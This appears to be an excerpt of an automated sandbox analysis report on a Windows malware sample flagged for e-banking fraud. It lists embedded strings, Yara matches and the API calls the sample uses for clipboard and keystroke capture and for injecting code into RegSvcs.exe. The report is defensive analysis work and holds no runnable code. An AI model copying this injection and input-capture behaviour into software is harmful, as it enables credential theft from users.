                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000000.2196955869.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2586770726.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3151702741.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe, 00000014.00000000.2644570578.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EFF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_00EFF45C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EFF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_00EFF6C7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00EEA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,8_2_00EEA54A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2; Code function: 8_2_00F19ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_00F19ED5

                E-Banking Fraud

Source: Yara match; File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0042CCE3 NtClose
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014635C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01464340 NtSetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01464650 NtSuspendThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462B60 NtClose
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462BE0 NtQueryValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462BF0 NtAllocateVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462B80 NtQueryInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462BA0 NtEnumerateValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462AD0 NtReadFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462AF0 NtWriteFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462AB0 NtWaitForSingleObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462D00 NtSetInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462D10 NtMapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462D30 NtUnmapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462DD0 NtDelayExecution
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462DB0 NtEnumerateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462C60 NtCreateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462C00 NtQueryInformationProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462CC0 NtQueryVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462CF0 NtOpenProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462CA0 NtQueryInformationToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462F60 NtCreateProcessEx
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462F30 NtCreateSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462FE0 NtCreateFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462F90 NtProtectVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462FA0 NtQuerySection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462FB0 NtResumeThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462E30 NtWriteVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462EE0 NtQueueApcThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462E80 NtReadVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01462EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01463010 NtOpenDirectoryObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01463090 NtSetValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014639B0 NtGetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01463D70 NtOpenThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01463D10 NtOpenProcessToken
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00C99B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EE1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EEF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CA355D
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CAB76F
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00C9BF3D
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CBC0D6
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CAA008
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CB92D0
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CAC27F
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CA5214
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CAA222
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CC4360
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CA46CF
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CC86D2
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00C948AA
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CC480E
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00C95AFE
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CAABC8
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00C97CBA
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CABC05
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00C93D9D
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CA4D32
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CBBEA7
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CA5F0B
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00C95F39
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_0121D120
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_01263D28
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_0121BC69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_0121BC70
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_01262871
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_01262878
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_0121C4B0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_012630B8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_0121CC80
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_0121CC82
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_0126388A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_01263888
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_0121B3E0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_3_01261FE8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00E9E0BE
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EA8037
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EA2007
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00E8E1A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EA22C2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EBA28E
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00E8225D
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00E9C59E
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00F0C7A3
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EBE89F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EF291A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EB6AFB
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EE8B27
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EACE30
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00F151D2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EB7169
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00E89240
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00E89499
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EA1724
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EA1A96
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EA7BAB
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00E89B60
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EA7DDA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EA1D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00418BF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_004031C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0042F2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_004103E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00402550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00402D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00402D22
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00416DEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00416DF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00410603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0040E603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0040E747
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0040E753
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0040E79C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014B8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01420100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014F01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E41A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014F03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0143E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014B02C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014F0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014D4420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014DE4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01454750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0142C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0144C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01446962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014FA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0143A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01432840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0145E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014168B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0142EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0143AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CCD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0142ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01448DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01430C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01420CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014D0CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014A4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01472F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01450F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014D2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01422FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0143CFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014AEFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01430E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01442E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014ECE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014FB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0146516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0141F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0143B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014DF0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0141D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0147739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0144B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014D12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014F95C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01421460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01475630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01439950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0144B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C5910
